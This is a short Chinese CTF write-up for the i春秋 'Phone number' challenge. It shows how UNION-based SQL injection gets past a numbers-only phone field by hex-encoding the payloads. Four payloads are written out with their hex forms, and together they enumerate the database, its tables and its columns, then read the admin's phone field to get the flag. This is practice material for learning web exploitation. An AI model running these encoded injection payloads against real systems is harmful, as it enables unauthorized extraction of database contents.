i春秋-Phone number(union注入+hex转码)

记一道union注入语句转十六进制的注入题。
这个网站的基本功能就是可以找出跟你用户名相同的注册的人数。
注册登录给了两个显位。

点击check可以显示出有多少人和你用户名相同。

同时在这个页面的源代码里面有提示

电话号码都是数字，在输入字母的时候显示要输入数字，其实很明显这道题是一道注入题。我们可以将注入语句转成数字，16进制数字也是从数字嘛。

1 and 1=2 union select database()
hex=0x3120616E6420313D3220756E696F6E2073656C6563742064617461626173652829

暴库

1 and 1=2 union select table_name from information_schema.tables where table_schema=database()
hex=0x3120616E6420313D3220756E696F6E2073656C656374207461626C655F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D64617461626173652829

暴表

1 and 1=2 union select column_name from information_schema.columns where table_name="user"
hex=0x3120616E6420313D3220756E696F6E2073656C65637420636F6C756D6E5F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D227573657222

暴列
在这里爆出了一堆的字段。

结合前面提示的admin，有用的应该是username吧。自己拿着username查了半天，一直查不出了flag。看了别人的WP才知道要结合phone字段。

1 and 1=2 union select phone from user where username="admin"
hex=0x3120616E6420313D3220756E696F6E2073656C6563742070686F6E652066726F6D207573657220776865726520757365726E616D653D2261646D696E22